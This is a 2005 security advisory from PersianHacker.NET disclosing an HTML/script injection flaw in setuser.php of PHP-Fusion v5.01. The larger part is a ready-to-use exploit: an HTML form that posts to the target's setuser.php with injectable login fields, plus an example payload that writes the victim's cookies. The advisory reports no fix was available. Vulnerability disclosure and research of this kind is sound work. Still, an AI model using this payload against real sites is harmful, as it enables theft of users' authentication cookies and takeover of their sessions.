[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability Date: 2005 March Bug Number: 10 PHP-Fusion a light-weight open-source content management system (CMS) written in PHP. It utilises a mySQL database to store your site content and includes a simple, comprehensive adminstration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages More info @: http://php-fusion.co.uk/ Discussion: -------------------- The software does not properly validate user-supplied input in 'setuser.php'. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Exploit: -------------------- <html> <head> <title>PHP-Fusion v5.01 Exploit</title> </head> <body> <h1>PHP-Fusion v5.01 Html Injection Exploit</h1> <form method="POST" action="http://www.example.com/setuser.php";> <b>XSS in register.php:</b><p> Username: <input type="text" name="user_name" size="48" value="XSS Injection Code"></p> <p> Password: <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p> <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br> exmple: <script>document.write(document.cookie)</script></p> <p> <input type='submit' name='login' value='RUN!' class='button'></p> </form> <p> </p> <p align="center"><a href="http://www.PersianHacker.NET";>www.PersianHacker.NET</a></p> </body> </html> Solution: -------------------- No solution was available at the time of this entry. Credit: -------------------- Discovered by PersianHacker.NET Security Team by Pi3cH (pi3ch persianhacker net) http://www.PersianHacker.NET Special Thanks: devil_box(for xss article), amectris, herbod. Help -------------------- visit: http://www.PersianHacker.NET or mail me @: pi3ch persianhacker net
